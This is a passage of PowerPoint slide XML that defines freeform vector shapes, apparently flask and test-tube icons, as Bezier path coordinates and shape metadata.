                    <a:pt x="206" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="487"/>
                    <a:pt x="206" y="487"/>
                    <a:pt x="206" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="487"/>
                    <a:pt x="206" y="487"/>
                    <a:pt x="206" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="487"/>
                    <a:pt x="206" y="487"/>
                    <a:pt x="206" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="487"/>
                    <a:pt x="207" y="487"/>
                    <a:pt x="207" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="487"/>
                    <a:pt x="207" y="487"/>
                    <a:pt x="207" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="487"/>
                    <a:pt x="207" y="487"/>
                    <a:pt x="207" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="487"/>
                    <a:pt x="207" y="487"/>
                    <a:pt x="207" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="487"/>
                    <a:pt x="208" y="487"/>
                    <a:pt x="208" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="487"/>
                    <a:pt x="208" y="487"/>
                    <a:pt x="208" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="487"/>
                    <a:pt x="208" y="487"/>
                    <a:pt x="208" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="487"/>
                    <a:pt x="208" y="487"/>
                    <a:pt x="208" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="487"/>
                    <a:pt x="209" y="487"/>
                    <a:pt x="209" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="487"/>
                    <a:pt x="209" y="487"/>
                    <a:pt x="209" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="487"/>
                    <a:pt x="209" y="487"/>
                    <a:pt x="209" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="487"/>
                    <a:pt x="209" y="487"/>
                    <a:pt x="209" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="487"/>
                    <a:pt x="210" y="487"/>
                    <a:pt x="210" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="487"/>
                    <a:pt x="210" y="487"/>
                    <a:pt x="210" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="487"/>
                    <a:pt x="210" y="487"/>
                    <a:pt x="210" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="487"/>
                    <a:pt x="210" y="487"/>
                    <a:pt x="210" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="487"/>
                    <a:pt x="211" y="487"/>
                    <a:pt x="211" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="487"/>
                    <a:pt x="211" y="487"/>
                    <a:pt x="211" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="487"/>
                    <a:pt x="211" y="487"/>
                    <a:pt x="211" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="487"/>
                    <a:pt x="211" y="487"/>
                    <a:pt x="211" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="487"/>
                    <a:pt x="212" y="487"/>
                    <a:pt x="212" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="487"/>
                    <a:pt x="212" y="487"/>
                    <a:pt x="212" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="487"/>
                    <a:pt x="212" y="487"/>
                    <a:pt x="212" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="487"/>
                    <a:pt x="212" y="487"/>
                    <a:pt x="212" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="487"/>
                    <a:pt x="213" y="487"/>
                    <a:pt x="213" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="487"/>
                    <a:pt x="213" y="487"/>
                    <a:pt x="213" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="487"/>
                    <a:pt x="213" y="487"/>
                    <a:pt x="213" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="487"/>
                    <a:pt x="213" y="487"/>
                    <a:pt x="213" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="487"/>
                    <a:pt x="214" y="487"/>
                    <a:pt x="214" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="487"/>
                    <a:pt x="214" y="487"/>
                    <a:pt x="214" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="487"/>
                    <a:pt x="214" y="487"/>
                    <a:pt x="214" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="487"/>
                    <a:pt x="214" y="487"/>
                    <a:pt x="214" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="487"/>
                    <a:pt x="215" y="487"/>
                    <a:pt x="215" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="487"/>
                    <a:pt x="215" y="487"/>
                    <a:pt x="215" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="487"/>
                    <a:pt x="215" y="487"/>
                    <a:pt x="215" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="487"/>
                    <a:pt x="215" y="487"/>
                    <a:pt x="215" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="487"/>
                    <a:pt x="216" y="487"/>
                    <a:pt x="216" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="479"/>
                    <a:pt x="510" y="346"/>
                    <a:pt x="515" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="442" y="112"/>
                    <a:pt x="379" y="55"/>
                    <a:pt x="369" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="55"/>
                    <a:pt x="313" y="55"/>
                    <a:pt x="285" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="55"/>
                    <a:pt x="282" y="87"/>
                    <a:pt x="280" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262" y="79"/>
                    <a:pt x="195" y="13"/>
                    <a:pt x="185" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="1"/>
                    <a:pt x="175" y="0"/>
                    <a:pt x="168" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="77498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69" name="Freeform 181">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F79B9A17-C845-0F4C-B08D-ECAF1B34F016}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3467100" y="4495800"/>
              <a:ext cx="285750" cy="169863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 122 w 166"/>
                <a:gd name="T1" fmla="*/ 0 h 99"/>
                <a:gd name="T2" fmla="*/ 44 w 166"/>
                <a:gd name="T3" fmla="*/ 0 h 99"/>
                <a:gd name="T4" fmla="*/ 9 w 166"/>
                <a:gd name="T5" fmla="*/ 66 h 99"/>
                <a:gd name="T6" fmla="*/ 27 w 166"/>
                <a:gd name="T7" fmla="*/ 99 h 99"/>
                <a:gd name="T8" fmla="*/ 139 w 166"/>
                <a:gd name="T9" fmla="*/ 99 h 99"/>
                <a:gd name="T10" fmla="*/ 157 w 166"/>
                <a:gd name="T11" fmla="*/ 66 h 99"/>
                <a:gd name="T12" fmla="*/ 122 w 166"/>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166" h="99">
                  <a:moveTo>
                    <a:pt x="122" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="0"/>
                    <a:pt x="44" y="0"/>
                    <a:pt x="44" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="66"/>
                    <a:pt x="9" y="66"/>
                    <a:pt x="9" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="84"/>
                    <a:pt x="7" y="99"/>
                    <a:pt x="27" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="99"/>
                    <a:pt x="139" y="99"/>
                    <a:pt x="139" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="99"/>
                    <a:pt x="166" y="84"/>
                    <a:pt x="157" y="66"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12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70" name="Freeform 182">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8422B608-33BD-7D45-A112-CDD85507CAFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3387725" y="4152900"/>
              <a:ext cx="446088" cy="585788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 177 w 260"/>
                <a:gd name="T1" fmla="*/ 122 h 341"/>
                <a:gd name="T2" fmla="*/ 177 w 260"/>
                <a:gd name="T3" fmla="*/ 31 h 341"/>
                <a:gd name="T4" fmla="*/ 182 w 260"/>
                <a:gd name="T5" fmla="*/ 26 h 341"/>
                <a:gd name="T6" fmla="*/ 182 w 260"/>
                <a:gd name="T7" fmla="*/ 5 h 341"/>
                <a:gd name="T8" fmla="*/ 176 w 260"/>
                <a:gd name="T9" fmla="*/ 0 h 341"/>
                <a:gd name="T10" fmla="*/ 83 w 260"/>
                <a:gd name="T11" fmla="*/ 0 h 341"/>
                <a:gd name="T12" fmla="*/ 78 w 260"/>
                <a:gd name="T13" fmla="*/ 5 h 341"/>
                <a:gd name="T14" fmla="*/ 78 w 260"/>
                <a:gd name="T15" fmla="*/ 26 h 341"/>
                <a:gd name="T16" fmla="*/ 83 w 260"/>
                <a:gd name="T17" fmla="*/ 31 h 341"/>
                <a:gd name="T18" fmla="*/ 83 w 260"/>
                <a:gd name="T19" fmla="*/ 31 h 341"/>
                <a:gd name="T20" fmla="*/ 83 w 260"/>
                <a:gd name="T21" fmla="*/ 122 h 341"/>
                <a:gd name="T22" fmla="*/ 9 w 260"/>
                <a:gd name="T23" fmla="*/ 271 h 341"/>
                <a:gd name="T24" fmla="*/ 6 w 260"/>
                <a:gd name="T25" fmla="*/ 317 h 341"/>
                <a:gd name="T26" fmla="*/ 46 w 260"/>
                <a:gd name="T27" fmla="*/ 341 h 341"/>
                <a:gd name="T28" fmla="*/ 130 w 260"/>
                <a:gd name="T29" fmla="*/ 341 h 341"/>
                <a:gd name="T30" fmla="*/ 214 w 260"/>
                <a:gd name="T31" fmla="*/ 341 h 341"/>
                <a:gd name="T32" fmla="*/ 254 w 260"/>
                <a:gd name="T33" fmla="*/ 317 h 341"/>
                <a:gd name="T34" fmla="*/ 251 w 260"/>
                <a:gd name="T35" fmla="*/ 271 h 341"/>
                <a:gd name="T36" fmla="*/ 177 w 260"/>
                <a:gd name="T37" fmla="*/ 122 h 341"/>
                <a:gd name="T38" fmla="*/ 237 w 260"/>
                <a:gd name="T39" fmla="*/ 306 h 341"/>
                <a:gd name="T40" fmla="*/ 214 w 260"/>
                <a:gd name="T41" fmla="*/ 318 h 341"/>
                <a:gd name="T42" fmla="*/ 46 w 260"/>
                <a:gd name="T43" fmla="*/ 318 h 341"/>
                <a:gd name="T44" fmla="*/ 23 w 260"/>
                <a:gd name="T45" fmla="*/ 306 h 341"/>
                <a:gd name="T46" fmla="*/ 26 w 260"/>
                <a:gd name="T47" fmla="*/ 282 h 341"/>
                <a:gd name="T48" fmla="*/ 26 w 260"/>
                <a:gd name="T49" fmla="*/ 282 h 341"/>
                <a:gd name="T50" fmla="*/ 101 w 260"/>
                <a:gd name="T51" fmla="*/ 130 h 341"/>
                <a:gd name="T52" fmla="*/ 102 w 260"/>
                <a:gd name="T53" fmla="*/ 125 h 341"/>
                <a:gd name="T54" fmla="*/ 102 w 260"/>
                <a:gd name="T55" fmla="*/ 38 h 341"/>
                <a:gd name="T56" fmla="*/ 158 w 260"/>
                <a:gd name="T57" fmla="*/ 38 h 341"/>
                <a:gd name="T58" fmla="*/ 158 w 260"/>
                <a:gd name="T59" fmla="*/ 125 h 341"/>
                <a:gd name="T60" fmla="*/ 159 w 260"/>
                <a:gd name="T61" fmla="*/ 130 h 341"/>
                <a:gd name="T62" fmla="*/ 234 w 260"/>
                <a:gd name="T63" fmla="*/ 282 h 341"/>
                <a:gd name="T64" fmla="*/ 234 w 260"/>
                <a:gd name="T65" fmla="*/ 282 h 341"/>
                <a:gd name="T66" fmla="*/ 237 w 260"/>
                <a:gd name="T67" fmla="*/ 306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0" h="341">
                  <a:moveTo>
                    <a:pt x="177" y="122"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="31"/>
                    <a:pt x="177" y="31"/>
                    <a:pt x="177" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="31"/>
                    <a:pt x="182" y="29"/>
                    <a:pt x="182" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="5"/>
                    <a:pt x="182" y="5"/>
                    <a:pt x="182" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="2"/>
                    <a:pt x="179" y="0"/>
                    <a:pt x="176" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="83" y="0"/>
                    <a:pt x="83" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="0"/>
                    <a:pt x="78" y="2"/>
                    <a:pt x="78" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="26"/>
                    <a:pt x="78" y="26"/>
                    <a:pt x="78" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="29"/>
                    <a:pt x="80" y="31"/>
                    <a:pt x="83" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="31"/>
                    <a:pt x="83" y="31"/>
                    <a:pt x="83" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="122"/>
                    <a:pt x="83" y="122"/>
                    <a:pt x="83" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="271"/>
                    <a:pt x="9" y="271"/>
                    <a:pt x="9" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="287"/>
                    <a:pt x="0" y="304"/>
                    <a:pt x="6" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="332"/>
                    <a:pt x="28" y="341"/>
                    <a:pt x="46" y="341"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="341"/>
                    <a:pt x="130" y="341"/>
                    <a:pt x="130" y="341"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="341"/>
                    <a:pt x="214" y="341"/>
                    <a:pt x="214" y="341"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="341"/>
                    <a:pt x="246" y="332"/>
                    <a:pt x="254" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="304"/>
                    <a:pt x="259" y="287"/>
                    <a:pt x="251" y="271"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="177" y="122"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="237" y="306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="314"/>
                    <a:pt x="225" y="318"/>
                    <a:pt x="214" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="318"/>
                    <a:pt x="46" y="318"/>
                    <a:pt x="46" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="318"/>
                    <a:pt x="27" y="314"/>
                    <a:pt x="23" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="300"/>
                    <a:pt x="21" y="291"/>
                    <a:pt x="26" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="282"/>
                    <a:pt x="26" y="282"/>
                    <a:pt x="26" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="130"/>
                    <a:pt x="101" y="130"/>
                    <a:pt x="101" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="129"/>
                    <a:pt x="102" y="127"/>
                    <a:pt x="102" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="38"/>
                    <a:pt x="102" y="38"/>
                    <a:pt x="102" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="38"/>
                    <a:pt x="158" y="38"/>
                    <a:pt x="158" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="125"/>
                    <a:pt x="158" y="125"/>
                    <a:pt x="158" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="127"/>
                    <a:pt x="158" y="129"/>
                    <a:pt x="159" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="282"/>
                    <a:pt x="234" y="282"/>
                    <a:pt x="234" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="282"/>
                    <a:pt x="234" y="282"/>
                    <a:pt x="234" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="291"/>
                    <a:pt x="240" y="300"/>
                    <a:pt x="237" y="30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71" name="Freeform 183">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68DD8BCF-8416-0744-9AAC-E68FFFCCB670}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3908425" y="4429125"/>
              <a:ext cx="96838" cy="255588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 27 w 56"/>
                <a:gd name="T1" fmla="*/ 149 h 149"/>
                <a:gd name="T2" fmla="*/ 28 w 56"/>
                <a:gd name="T3" fmla="*/ 149 h 149"/>
                <a:gd name="T4" fmla="*/ 56 w 56"/>
                <a:gd name="T5" fmla="*/ 121 h 149"/>
                <a:gd name="T6" fmla="*/ 56 w 56"/>
                <a:gd name="T7" fmla="*/ 0 h 149"/>
                <a:gd name="T8" fmla="*/ 0 w 56"/>
                <a:gd name="T9" fmla="*/ 0 h 149"/>
                <a:gd name="T10" fmla="*/ 0 w 56"/>
                <a:gd name="T11" fmla="*/ 121 h 149"/>
                <a:gd name="T12" fmla="*/ 27 w 56"/>
                <a:gd name="T13" fmla="*/ 149 h 149"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T12" y="T13"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="56" h="149">
                  <a:moveTo>
                    <a:pt x="27" y="149"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="149"/>
                    <a:pt x="28" y="149"/>
                    <a:pt x="28" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="149"/>
                    <a:pt x="56" y="136"/>
                    <a:pt x="56" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="0"/>
                    <a:pt x="56" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="121"/>
                    <a:pt x="0" y="121"/>
                    <a:pt x="0" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="136"/>
                    <a:pt x="12" y="149"/>
                    <a:pt x="27" y="14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72" name="Freeform 184">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBFAC63D-4E9D-0D46-99CE-A2727EF80D56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3849688" y="4246563"/>
              <a:ext cx="211138" cy="492125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 114 w 123"/>
                <a:gd name="T1" fmla="*/ 0 h 287"/>
                <a:gd name="T2" fmla="*/ 10 w 123"/>
                <a:gd name="T3" fmla="*/ 0 h 287"/>
                <a:gd name="T4" fmla="*/ 0 w 123"/>
                <a:gd name="T5" fmla="*/ 9 h 287"/>
                <a:gd name="T6" fmla="*/ 0 w 123"/>
                <a:gd name="T7" fmla="*/ 21 h 287"/>
                <a:gd name="T8" fmla="*/ 8 w 123"/>
                <a:gd name="T9" fmla="*/ 30 h 287"/>
                <a:gd name="T10" fmla="*/ 8 w 123"/>
                <a:gd name="T11" fmla="*/ 230 h 287"/>
                <a:gd name="T12" fmla="*/ 64 w 123"/>
                <a:gd name="T13" fmla="*/ 287 h 287"/>
                <a:gd name="T14" fmla="*/ 64 w 123"/>
                <a:gd name="T15" fmla="*/ 287 h 287"/>
                <a:gd name="T16" fmla="*/ 102 w 123"/>
                <a:gd name="T17" fmla="*/ 269 h 287"/>
                <a:gd name="T18" fmla="*/ 116 w 123"/>
                <a:gd name="T19" fmla="*/ 230 h 287"/>
                <a:gd name="T20" fmla="*/ 116 w 123"/>
                <a:gd name="T21" fmla="*/ 30 h 287"/>
                <a:gd name="T22" fmla="*/ 123 w 123"/>
                <a:gd name="T23" fmla="*/ 21 h 287"/>
                <a:gd name="T24" fmla="*/ 123 w 123"/>
                <a:gd name="T25" fmla="*/ 9 h 287"/>
                <a:gd name="T26" fmla="*/ 114 w 123"/>
                <a:gd name="T27" fmla="*/ 0 h 287"/>
                <a:gd name="T28" fmla="*/ 99 w 123"/>
                <a:gd name="T29" fmla="*/ 230 h 287"/>
                <a:gd name="T30" fmla="*/ 89 w 123"/>
                <a:gd name="T31" fmla="*/ 257 h 287"/>
                <a:gd name="T32" fmla="*/ 64 w 123"/>
                <a:gd name="T33" fmla="*/ 269 h 287"/>
                <a:gd name="T34" fmla="*/ 64 w 123"/>
                <a:gd name="T35" fmla="*/ 269 h 287"/>
                <a:gd name="T36" fmla="*/ 25 w 123"/>
                <a:gd name="T37" fmla="*/ 230 h 287"/>
                <a:gd name="T38" fmla="*/ 25 w 123"/>
                <a:gd name="T39" fmla="*/ 40 h 287"/>
                <a:gd name="T40" fmla="*/ 99 w 123"/>
                <a:gd name="T41" fmla="*/ 40 h 287"/>
                <a:gd name="T42" fmla="*/ 99 w 123"/>
                <a:gd name="T43" fmla="*/ 23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3" h="287">
                  <a:moveTo>
                    <a:pt x="114" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="0" y="4"/>
                    <a:pt x="0" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21"/>
                    <a:pt x="0" y="21"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="4" y="29"/>
                    <a:pt x="8" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="230"/>
                    <a:pt x="8" y="230"/>
                    <a:pt x="8" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="260"/>
                    <a:pt x="34" y="287"/>
                    <a:pt x="64" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="287"/>
                    <a:pt x="64" y="287"/>
                    <a:pt x="64" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="287"/>
                    <a:pt x="92" y="280"/>
                    <a:pt x="102" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="258"/>
                    <a:pt x="116" y="245"/>
                    <a:pt x="116" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="30"/>
                    <a:pt x="116" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="29"/>
                    <a:pt x="123" y="25"/>
                    <a:pt x="123" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="9"/>
                    <a:pt x="123" y="9"/>
                    <a:pt x="123" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="114" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="99" y="230"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="240"/>
                    <a:pt x="95" y="250"/>
                    <a:pt x="89" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="265"/>
                    <a:pt x="73" y="269"/>
                    <a:pt x="64" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="269"/>
                    <a:pt x="64" y="269"/>
                    <a:pt x="64" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="269"/>
                    <a:pt x="25" y="250"/>
                    <a:pt x="25" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="40"/>
                    <a:pt x="25" y="40"/>
                    <a:pt x="25" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="40"/>
                    <a:pt x="99" y="40"/>
                    <a:pt x="99" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="2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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="73" name="组合 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA6FC843-0270-AD40-8C46-60BB0B441E5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
